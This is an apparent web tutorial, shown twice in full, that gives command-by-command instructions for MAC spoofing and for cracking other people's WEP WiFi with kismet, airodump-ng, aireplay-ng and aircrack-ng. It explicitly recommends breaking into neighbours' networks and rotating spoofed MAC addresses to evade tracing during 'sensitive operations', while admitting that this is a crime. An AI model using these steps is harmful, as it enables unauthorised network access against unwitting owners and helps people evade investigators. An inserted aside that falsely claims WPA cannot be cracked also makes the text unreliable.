WiFi, Backtrack (And Mac Spoofing)
MAC Spoofing
What software you use for this depends on what OS you are using.
Ubuntu
Sudo apt-get install macchanger
Now when you want to change your Mac address, do it in the following format: macchanger [options] device
You can get a full list of options by typing in macchanger --help
Windows
Windows has a variety of programs that allow you to change the MAC address. Some cost money and some do not. One I found is called Technitium and it appears to be free. I cannot make any endorsement of this software product, but it appears to be legitimate and work fine. It has an easy to use GUI to help you change your MAC address.
Macintosh
There seem to be a wide variety of ways to spoof the Mac on Macintosh computers (I am far from an expert with Macintosh, having used one only once for the purpose of writing the Mac part of these tutorials), some of them working on some systems and not others, etc. So I am going to have a hard time explaining how to do this with a Macintosh.
For some, this works:
From a terminal type in the following: sudo airport -m [new mac]
If this technique does not work for you, I suggest you research the matter on your own and try and figure a solution out. I am sure there is some way to do it with a Mac, but the problem seems to be there are many ways to do it and it is different for different operating system versions and architectures. If you find a way to do it send me the details and I will add it here.
WEP Cracking
For cracking WEP we are going to be using a special tool called Backtrack. Backtrack is an operating system that essentially has the point of making it very easy for you to crack WiFi, so find a copy of it and burn it to a disc. Now boot from it. If you get your WiFi card bridged properly to a virtual machine you could do this from there as well.
When you load Backtrack it will ask you for a username and password. The username is admin and the password is toor. Considering you are going to want to be using the desktop GUI to do things with, you need to type in: startx after you login, to get the desktop to start. Once you are at the desktop, open up a terminal and we can get started.
1. Type kismet in terminal. If it asks you for your wireless interface, go ahead and point it to it (iwconfig should show all available wireless networking interfaces)
2. In kismet, type in s and then Q (it is case sensitive). This removes kismet from the autofit mode, and lets you move around looking at the available hotspots and their information.
3. Look for access points that have a "Y" in the encryption criteria area. These are WEP encrypted networks, and you will be able to crack them. (If they are flagged with "N" they are open and you can probably access them without cracking encryption. If they are "O" they are another sort of encryption, likely WPA, and there isn't much chance you can crack them).
4. Select the hotspot you want to crack (make sure it is encrypted with WEP). Copy the following information ( essid, bssid, and channel number). Make sure you leave kismet running even though we are done using it for now (to leave your WiFi card in the appropriate mode)
5. Open a new terminal. Now we are going to run a program called airodump. Type in the following:
airodump-ng [wifi device name] -w [a location to store information you need to access in the future] [the channel the hotspot is running on. You know this from the last step] 1
You of course are going to need to replace what is in the [] with what the correct information is. But do not include the [] themselves.
6. Open a new terminal. We are now going to do a replay attack. Enter the following:
aireplay-ng -1 0 -e [essid of the hotspot you got in step 4] -a [bssid of the target you got in step 4] -h [your Mac address] [your wireless device]
If you need to find your Mac address, you can type in: macchanger -s [your wireless device]
As before, you are going to need to replace the things in [] with their appropriate value, and also as before don't include the actual [].
7. Now we need to do a packet injection attack to speed things up. Enter the following in a terminal:
aireplay-ng -3 -b [bssid of target hotspot] -h [your Mac address] [your wireless device]
Now sit back and wait for a while. You should notice ARP beings collected, hopefully at a fairly fast rate. The more ARPs you collect, the more likely you are to be able to break the WEP encryption. A few hundred thousand will give you your best chance of breaking it.
8. After you have gathered a lot of ARPs and are ready to give breaking the encryption a shot, open a new terminal and type this:
aircrack-ng -s [the location of the file you specified to store IVs in at step 5]
After a little while aircrack will either tell you it broke the key and give it to you, or it will tell you that you are screwed in which case you will need to gather more ARPs and try again. I suggest you make your first attempt with around four hundred thousand ARPs, but it is fully possible it could work with less.
How It Works
WiFi Principles
WiFi is simply wireless internet, I am sure everyone already knows this. Essentially, when you make a WiFi connection, you are using a network card and an antenna to send a signal to a router or a modem. This is designed so that you can access the internet from various places in your location, usually with a laptop, rather than be tied down to near a phone jack or other wired style connection. A single wired connection with proper equipment can provide internet access to a wide area.
In the context of anonymity, WiFi can be used to gain access to the internet from a connection that has no actual ties to you. Many WiFi providing devices are not secured (open WiFi) and many are secured with easy to crack encryption (WEP). By going to random locations and utilizing open WiFi, you can interact with the internet without giving a direct link back to you.
This can be used alone, or it can be used in addition to anonymity networks such as Tor, which do provide a solid link back but attempt to make it very difficult to follow the connect to you.
There are a few things to keep in mind when using WiFi. The first thing to keep in mind is that it is not actually perfect anonymity. There are a few ways WiFi can be traced back to you, some posing more serious threats than others. The first thing to know is that your computers network card has an individual MAC address, and when you connect to a WiFi hotspot, the hotspot can see your MAC address. Now there is not a big registry of MAC addresses, so just seeing your MAC address does not give away your identity. But if your computer is ever seized and the MAC address of your network card determined (easy to do if the physical computer is seized), there can be strong circumstantial evidence that a connection came from your computer if the seizer has access to logs from the WiFi hotspot. This threat is fairly easy to go around, you can simply spoof your Mac address, which means you tell your computer to give out a Mac address of your choosing (rather than the real MAC address). An adversary with access to the logs of various WiFi hotspots could manage to over time build a profile of you in various ways. For example, let's say you always use WiFi at a particular coffee shop, and the coffee shop agrees to cooperate with your adversary. They simply log your MAC address in different locations (different coffee shops of the same branch) as well as keep CCTV footage. Now the two can be put together, and through the process of elimination your image can be determined, and possibly the image of a vehicle if you drove to the coffee shop. Now they have your license plate and very strong evidence against you. So spoof your Mac with a new Mac address every single time you make a connection, to reduce the chances of this happening. Also, you should use Tor or similar in addition to WiFi, to make the initial trace back to the coffee shop expensive and time consuming for the adversary.
Another thing you need to keep in mind is that WiFi signals can in fact be traced back using techniques similar to triangulation. You connect to a WiFi hotspot, now someone with specialized WiFi analyzers can hone in on you (likely using directional antennas) by tracing the signal back to you and using mathematical algorithms to determine your location based on signal strength. So WiFi is not an absolute disconnect between you and the WiFi hotspot. If you are always using the same WiFi hotspot, you can eventually be traced back, so always using your neighbors WiFi might actually not be a good idea (although it is better than nothing most likely, it is not better than using a new hotspot each time). I know people who have gotten unfriendly visits by folks who had been able to determine they were using their neighbors WiFi to access the internet (although the visit was not over that) so it is a possibility. Generally, the further away from the access point you are, the longer it will take for someone to find you.
Also, keep in mind that if you are using an unsecured WiFi connection (open WiFi rather than cracked WEP or WPA), your connection information and what you are saying can easily be eavesdropped on both by random individuals with spectrum analyzers and by the person who owns the hotspot you are connecting to. Even with WEP you are at risk of random people in the area seeing what you are doing (WEP isn't hard to crack, remember?). Even with WPA (if you could manage to crack it) the person who owns the access point you are using can see what you say and who you say it to. Even if you self encrypt with SSL, the person who owns the access point you are using can see who you are talking to (but not what you say). For this reason, it is VERY important you use Tor or at the very least some sort of encrypted proxy when you are using WiFi. That way, in addition to the person who owns the access point not being able to see what you say (thanks to encryption) they cannot see who you are talking to (except for that you are talking to the Tor network, or some other proxy).
As far as the actual equipment involved (from your perspective) in using WiFi for anonymity, you are going to need to select an Antenna and a network card. There are two types of antennas, directional’s and Omni’s.
The above two images display the two primary types of antenna (the first is directional, the second is Omni). There are also mounted antennas (usually Omni) that look like squares and can be stuck on the back of a laptop. Directional antennas tend to signal strength further away than price equivalent Omni’s, but they get signals only in a very narrow beam. They are ideal antennas for if you have a place to set up (hotel room, house, and park bench) because of the range and control of the beam. They do not tend to be discrete, and are not good for war driving. Omni antennas do not tend to get as good of distance as directional antennas in any particular direction, but they can get signals from 360 degrees. They tend to be more discrete and are probably what you are going to want to get.
You are also going to need a network card to hook your antenna up to. Network cards are different looking for laptops and desktops. Here is an image of a standard laptop network card with an Omni antenna attached to it.
You are going to want to make sure your network card is compatible with the Aircrack suite. They have a list of compatible cards on their website. If you card is not compatible, you will find it nearly impossible to crack WiFi with it, but can still take advantage of unsecured and / or public connections.
WEP and WPA
Although many WiFi connections are non-secured (meaning anyone can access them), some are secured with encryption. The two most popular WiFi encryption algorithms are WEP and WPA. Thankfully for those who seek to use WiFi for anonymity, WEP is very easy to crack. This is due to a fundamental flaw in its architecture. Many people use WEP. WPA is harder to crack, (FALSE, WPA can't be cracked. Just use a randomly generated 63 chars (upper lower case numbers symbols spaces) and no computer can get the pass in less than 99999999999999999999999999999999999999999999999 billon years, if you put things which can be guessed then you have no security, but if you have my type of pass NOBODY can crack it) and often times you will have no luck even attempting to do so. You can crack WPA with brute force attacks, dictionary attacks and other standard attacks on passwords, but you will in many cases be unable to break the security. Although it can never hurt to try. Also, some WiFi access points have Mac address based restrictions, but it is easy to get around these with spoofing.
Overall Opinion
It is my opinion that WiFi definitely has its advantages and disadvantages, and if you should use it or not depends on how you plan to use it as well as your situation. If you are planning on using WiFi from the area you live, you should aim to use open WiFi over encrypted WiFi, simply because it is in fact a crime to even crack WiFi without permission from the owner. You will likely not get in trouble for it either way though. But using open WiFi will allow you to blend in with others who are using it, and will not seem inherently suspicious in itself (lots of people use open WiFi around there area). I do think that using open WiFi and Tor from your area of living is superior to using simply Tor. I don't think it is greatly superior though. If you are going to crack WEP from your home, it is more questionable if the advantages outweigh the disadvantages. Perhaps Tor will have its anonymity compromised, and instead of finding you the attacker finds your neighbor. Or perhaps your neighbor notices you are using their WiFi and get police with WiFi analyzers to track you down and ask you to stop (even if it isn't related to what you are actually using their WiFi for). Even if Tor’s anonymity is breached, it would be trivial to trace a WiFi signal back from your neighbors to you, so it isn't even a sure thing that this will keep you safe. And as I said before, I do know someone who had an unfriendly visit and they did in fact know he had been using his neighbors WiFi. I still think in general you will likely be slightly more safe to crack your neighbors WEP than to use your own internet, but the final choice is up to you. I do certainly think you are better off to use open WiFi if at all possible though.
If you are able to travel to different locations every time you access the internet, or do so from more public places (such as areas that offer free public WiFi) you will in my opinion be greatly increasing your anonymity (although you should still use Tor as well). Be it cracking WEP using a tripod directional antenna in a hotel room, or simply using an Omni antenna to crack WEP (or access an unsecured connection) from a random park bench, you will make yourself harder to trace down. I suggest people who do highly sensitive operations (likely to attract scrutiny) combine Tor with random WiFi access points. I also think if you are doing a single sensitive operation (such as setting up a server, or sending a single E-mail to an unknown) you are definitely better off to temporarily use your neighbors WEP connection than to use your own internet connection. So in general using open or cracked WiFi gets my endorsement, but please do understand its limitations.
Copyright Black OP Security.
MAC Spoofing
What software you use for this depends on what OS you are using.
Ubuntu
Sudo apt-get install macchanger
Now when you want to change your Mac address, do it in the following format: macchanger [options] device
You can get a full list of options by typing in macchanger --help
Windows
Windows has a variety of programs that allow you to change the MAC address. Some cost money and some do not. One I found is called Technitium and it appears to be free. I cannot make any endorsement of this software product, but it appears to be legitimate and work fine. It has an easy to use GUI to help you change your MAC address.
Macintosh
There seem to be a wide variety of ways to spoof the Mac on Macintosh computers (I am far from an expert with Macintosh, having used one only once for the purpose of writing the Mac part of these tutorials), some of them working on some systems and not others, etc. So I am going to have a hard time explaining how to do this with a Macintosh.
For some, this works:
From a terminal type in the following: sudo airport -m [new mac]
If this technique does not work for you, I suggest you research the matter on your own and try and figure a solution out. I am sure there is some way to do it with a Mac, but the problem seems to be there are many ways to do it and it is different for different operating system versions and architectures. If you find a way to do it send me the details and I will add it here.
WEP Cracking
For cracking WEP we are going to be using a special tool called Backtrack. Backtrack is an operating system that essentially has the point of making it very easy for you to crack WiFi, so find a copy of it and burn it to a disc. Now boot from it. If you get your WiFi card bridged properly to a virtual machine you could do this from there as well.
When you load Backtrack it will ask you for a username and password. The username is admin and the password is toor. Considering you are going to want to be using the desktop GUI to do things with, you need to type in: startx after you login, to get the desktop to start. Once you are at the desktop, open up a terminal and we can get started.
1. Type kismet in terminal. If it asks you for your wireless interface, go ahead and point it to it (iwconfig should show all available wireless networking interfaces)
2. In kismet, type in s and then Q (it is case sensitive). This removes kismet from the autofit mode, and lets you move around looking at the available hotspots and their information.
3. Look for access points that have a "Y" in the encryption criteria area. These are WEP encrypted networks, and you will be able to crack them. (If they are flagged with "N" they are open and you can probably access them without cracking encryption. If they are "O" they are another sort of encryption, likely WPA, and there isn't much chance you can crack them).
4. Select the hotspot you want to crack (make sure it is encrypted with WEP). Copy the following information ( essid, bssid, and channel number). Make sure you leave kismet running even though we are done using it for now (to leave your WiFi card in the appropriate mode)
5. Open a new terminal. Now we are going to run a program called airodump. Type in the following:
airodump-ng [wifi device name] -w [a location to store information you need to access in the future] [the channel the hotspot is running on. You know this from the last step] 1
You of course are going to need to replace what is in the [] with what the correct information is. But do not include the [] themselves.
6. Open a new terminal. We are now going to do a replay attack. Enter the following:
aireplay-ng -1 0 -e [essid of the hotspot you got in step 4] -a [bssid of the target you got in step 4] -h [your Mac address] [your wireless device]
If you need to find your Mac address, you can type in: macchanger -s [your wireless device]
As before, you are going to need to replace the things in [] with their appropriate value, and also as before don't include the actual [].
7. Now we need to do a packet injection attack to speed things up. Enter the following in a terminal:
aireplay-ng -3 -b [bssid of target hotspot] -h [your Mac address] [your wireless device]
Now sit back and wait for a while. You should notice ARP beings collected, hopefully at a fairly fast rate. The more ARPs you collect, the more likely you are to be able to break the WEP encryption. A few hundred thousand will give you your best chance of breaking it.
8. After you have gathered a lot of ARPs and are ready to give breaking the encryption a shot, open a new terminal and type this:
aircrack-ng -s [the location of the file you specified to store IVs in at step 5]
After a little while aircrack will either tell you it broke the key and give it to you, or it will tell you that you are screwed in which case you will need to gather more ARPs and try again. I suggest you make your first attempt with around four hundred thousand ARPs, but it is fully possible it could work with less.
How It Works
WiFi Principles
WiFi is simply wireless internet, I am sure everyone already knows this. Essentially, when you make a WiFi connection, you are using a network card and an antenna to send a signal to a router or a modem. This is designed so that you can access the internet from various places in your location, usually with a laptop, rather than be tied down to near a phone jack or other wired style connection. A single wired connection with proper equipment can provide internet access to a wide area.
In the context of anonymity, WiFi can be used to gain access to the internet from a connection that has no actual ties to you. Many WiFi providing devices are not secured (open WiFi) and many are secured with easy to crack encryption (WEP). By going to random locations and utilizing open WiFi, you can interact with the internet without giving a direct link back to you.
This can be used alone, or it can be used in addition to anonymity networks such as Tor, which do provide a solid link back but attempt to make it very difficult to follow the connect to you.
There are a few things to keep in mind when using WiFi. The first thing to keep in mind is that it is not actually perfect anonymity. There are a few ways WiFi can be traced back to you, some posing more serious threats than others. The first thing to know is that your computers network card has an individual MAC address, and when you connect to a WiFi hotspot, the hotspot can see your MAC address. Now there is not a big registry of MAC addresses, so just seeing your MAC address does not give away your identity. But if your computer is ever seized and the MAC address of your network card determined (easy to do if the physical computer is seized), there can be strong circumstantial evidence that a connection came from your computer if the seizer has access to logs from the WiFi hotspot. This threat is fairly easy to go around, you can simply spoof your Mac address, which means you tell your computer to give out a Mac address of your choosing (rather than the real MAC address). An adversary with access to the logs of various WiFi hotspots could manage to over time build a profile of you in various ways. For example, let's say you always use WiFi at a particular coffee shop, and the coffee shop agrees to cooperate with your adversary. They simply log your MAC address in different locations (different coffee shops of the same branch) as well as keep CCTV footage. Now the two can be put together, and through the process of elimination your image can be determined, and possibly the image of a vehicle if you drove to the coffee shop. Now they have your license plate and very strong evidence against you. So spoof your Mac with a new Mac address every single time you make a connection, to reduce the chances of this happening. Also, you should use Tor or similar in addition to WiFi, to make the initial trace back to the coffee shop expensive and time consuming for the adversary.
Another thing you need to keep in mind is that WiFi signals can in fact be traced back using techniques similar to triangulation. You connect to a WiFi hotspot, now someone with specialized WiFi analyzers can hone in on you (likely using directional antennas) by tracing the signal back to you and using mathematical algorithms to determine your location based on signal strength. So WiFi is not an absolute disconnect between you and the WiFi hotspot. If you are always using the same WiFi hotspot, you can eventually be traced back, so always using your neighbors WiFi might actually not be a good idea (although it is better than nothing most likely, it is not better than using a new hotspot each time). I know people who have gotten unfriendly visits by folks who had been able to determine they were using their neighbors WiFi to access the internet (although the visit was not over that) so it is a possibility. Generally, the further away from the access point you are, the longer it will take for someone to find you.
Also, keep in mind that if you are using an unsecured WiFi connection (open WiFi rather than cracked WEP or WPA), your connection information and what you are saying can easily be eavesdropped on both by random individuals with spectrum analyzers and by the person who owns the hotspot you are connecting to. Even with WEP you are at risk of random people in the area seeing what you are doing (WEP isn't hard to crack, remember?). Even with WPA (if you could manage to crack it) the person who owns the access point you are using can see what you say and who you say it to. Even if you self encrypt with SSL, the person who owns the access point you are using can see who you are talking to (but not what you say). For this reason, it is VERY important you use Tor or at the very least some sort of encrypted proxy when you are using WiFi. That way, in addition to the person who owns the access point not being able to see what you say (thanks to encryption) they cannot see who you are talking to (except for that you are talking to the Tor network, or some other proxy).
As far as the actual equipment involved (from your perspective) in using WiFi for anonymity, you are going to need to select an Antenna and a network card. There are two types of antennas, directional’s and Omni’s.
The above two images display the two primary types of antenna (the first is directional, the second is Omni). There are also mounted antennas (usually Omni) that look like squares and can be stuck on the back of a laptop. Directional antennas tend to signal strength further away than price equivalent Omni’s, but they get signals only in a very narrow beam. They are ideal antennas for if you have a place to set up (hotel room, house, and park bench) because of the range and control of the beam. They do not tend to be discrete, and are not good for war driving. Omni antennas do not tend to get as good of distance as directional antennas in any particular direction, but they can get signals from 360 degrees. They tend to be more discrete and are probably what you are going to want to get.
You are also going to need a network card to hook your antenna up to. Network cards are different looking for laptops and desktops. Here is an image of a standard laptop network card with an Omni antenna attached to it.
You are going to want to make sure your network card is compatible with the Aircrack suite. They have a list of compatible cards on their website. If you card is not compatible, you will find it nearly impossible to crack WiFi with it, but can still take advantage of unsecured and / or public connections.
WEP and WPA
Although many WiFi connections are non-secured (meaning anyone can access them), some are secured with encryption. The two most popular WiFi encryption algorithms are WEP and WPA. Thankfully for those who seek to use WiFi for anonymity, WEP is very easy to crack. This is due to a fundamental flaw in its architecture. Many people use WEP. WPA is harder to crack, (FALSE, WPA can't be cracked. Just use a randomly generated 63 chars (upper lower case numbers symbols spaces) and no computer can get the pass in less than 99999999999999999999999999999999999999999999999 billon years, if you put things which can be guessed then you have no security, but if you have my type of pass NOBODY can crack it) and often times you will have no luck even attempting to do so. You can crack WPA with brute force attacks, dictionary attacks and other standard attacks on passwords, but you will in many cases be unable to break the security. Although it can never hurt to try. Also, some WiFi access points have Mac address based restrictions, but it is easy to get around these with spoofing.
Overall Opinion
It is my opinion that WiFi definitely has its advantages and disadvantages, and if you should use it or not depends on how you plan to use it as well as your situation. If you are planning on using WiFi from the area you live, you should aim to use open WiFi over encrypted WiFi, simply because it is in fact a crime to even crack WiFi without permission from the owner. You will likely not get in trouble for it either way though. But using open WiFi will allow you to blend in with others who are using it, and will not seem inherently suspicious in itself (lots of people use open WiFi around there area). I do think that using open WiFi and Tor from your area of living is superior to using simply Tor. I don't think it is greatly superior though. If you are going to crack WEP from your home, it is more questionable if the advantages outweigh the disadvantages. Perhaps Tor will have its anonymity compromised, and instead of finding you the attacker finds your neighbor. Or perhaps your neighbor notices you are using their WiFi and get police with WiFi analyzers to track you down and ask you to stop (even if it isn't related to what you are actually using their WiFi for). Even if Tor’s anonymity is breached, it would be trivial to trace a WiFi signal back from your neighbors to you, so it isn't even a sure thing that this will keep you safe. And as I said before, I do know someone who had an unfriendly visit and they did in fact know he had been using his neighbors WiFi. I still think in general you will likely be slightly more safe to crack your neighbors WEP than to use your own internet, but the final choice is up to you. I do certainly think you are better off to use open WiFi if at all possible though.
If you are able to travel to different locations every time you access the internet, or do so from more public places (such as areas that offer free public WiFi) you will in my opinion be greatly increasing your anonymity (although you should still use Tor as well). Be it cracking WEP using a tripod directional antenna in a hotel room, or simply using an Omni antenna to crack WEP (or access an unsecured connection) from a random park bench, you will make yourself harder to trace down. I suggest people who do highly sensitive operations (likely to attract scrutiny) combine Tor with random WiFi access points. I also think if you are doing a single sensitive operation (such as setting up a server, or sending a single E-mail to an unknown) you are definitely better off to temporarily use your neighbors WEP connection than to use your own internet connection. So in general using open or cracked WiFi gets my endorsement, but please do understand its limitations.
Copyright Black OP Security.
